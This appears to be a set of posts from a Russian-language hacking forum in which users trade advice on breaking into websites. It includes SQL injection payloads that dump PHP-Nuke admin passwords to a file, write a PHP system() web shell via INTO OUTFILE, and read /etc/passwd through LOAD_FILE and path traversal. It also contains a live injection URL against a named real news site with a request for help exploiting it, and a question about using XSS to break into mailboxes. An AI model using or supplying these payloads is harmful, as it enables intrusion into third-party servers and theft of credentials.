Ну так и ищи под неё пароли в базе, если они там есть. Если нет-- ничего не делать, пароль от базы ты не вынешь скорее всего. В PostgreSQL доступ к pg_shadow имеет только superuser, так-что прав у тебя не хватит её прочитать
http://forum.antichat.ru/showpost.php?p=783899&postcount=2000 я могу с помощью этой XSS ломать ящики?
pg_shadow в постгресе не таблица Code: postgres=# \d pg_shadow View "pg_catalog.pg_shadow" Column | Type | Modifiers -------------+---------+----------- usename | name | usesysid | oid | usecreatedb | boolean | usesuper | boolean | usecatupd | boolean | passwd | text | valuntil | abstime | useconfig | text[] | View definition: SELECT pg_authid.rolname AS usename, pg_authid.oid AS usesysid, pg_authid.rolcreatedb AS usecreatedb, pg_authid.rolsuper AS usesuper, pg_authid.rolcatupdate AS usecatupd, pg_authid.rolpassword AS passwd, pg_authid.rolvaliduntil::abstime AS valuntil, pg_authid.rolconfig AS useconfig FROM pg_authid WHERE pg_authid.rolcanlogin; А про права правильно сказано обычному юзеру их не хватит
Не раз просили поглядеть уязвимости на сайтах, реализованных только на хтмл. В основном инет-магазины. есть какие статьи или "плезные советы" по поиску узявимостей на сайтах такого рода? для примера: http://easy.md/
ну а как опредилить пасивный xss от активного. То есть чем они отличаются я итак знал. Как определить какой надо использовать.
Так,может не сюда написал,но всё-таки. http://www.xakep.ru/magazine/xa/062/080/3.asp При использовании материала из этой статьи не получилось создать кривого имени файла(используя UNS префиксы \\?\),но с папками работает третий способ - и работает на ура)).У кого-нибудь получалось создавать *не удаляемые* файлы ? Также в статье говорилось,что существуют программы,способные исправить сию *пошлость*. Хотелось бы знать - какие.
http://127.0.0.1/phpnuke69/admin.php?op=login&pwd=123&aid=admin' INTO OUTFILE 'pwd.txt После запроса данной строки в БД исполняется: 9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin' INTO OUTFILE 'pwd.txt' Почему именно везде надо ставить одну кавычку ? почему не две?) Ваще *** какая-то - Если не ставить кавычек,он итак обрамляет ( 'buke','user' и т.д.).Так зачем ещё кавычки ставить ? Я использовал так : select '<?system();?>' into outfile '/tmp/cache/tratatata.php'/* Вот,я использовал 4 кавычки. Может я параноик... эти кавычки медленно,но верно убивают мой моск... спасите. ЗЫ: Напоминаю ещё раз - это всего лишь пример (я имею ввиду интерпретацию функций и путей,так что не ругайте =_= ).
Велемир Кто тебе сказал что НАДА ставить кавычку ? просто еслы ты не вставиш ковычку запрос выйдет такой 9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin INTO OUTFILE pwd.txt' тоесть выоплнется там ГДЕ aid = admin INTO OUTFILE pwd.txt ... а нам надо просто ещё часть запроса добваить поэтому мы делаем так ставим ковычку ' и полуается что мы указали что aid = admin но остаётся ещё одна проблема .... при таком раскладе выходит таой запрос 9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin INTO OUTFILE pwd.txt'' а поэтому нам не нужна ковычка в конце ... хотя моно добавить /* и всё остальное зашитается как коментарий =) п.с вроде всё правильно п.с.с это всё зависи от того как выглядит запрос в скрипте... иногда ваще надо вставлять не ' а "
Ладно-с...пасибо:Д.Вот не пойму,почему не грузится фаил лоад файлом(etc/passwd),имея права.Фильруются кавычки - двойные и одинарные. Как обычно,захексил всё нафиг(без кавычек разумеется(/etc/passwd).В итоге пустая страница,а такого не должно быть =_=.Пробывал и ../../../../../etc/passwd - результат один и тот же.Этот фаил доступен всегда,и права на чтения есть =_=.
http://www.russianbeat.com/news.cfm?date=07%2F24%2F2008&offset=0&article=22'+union+select+1/*&topic=latest Как раскрутить? Заранее thx.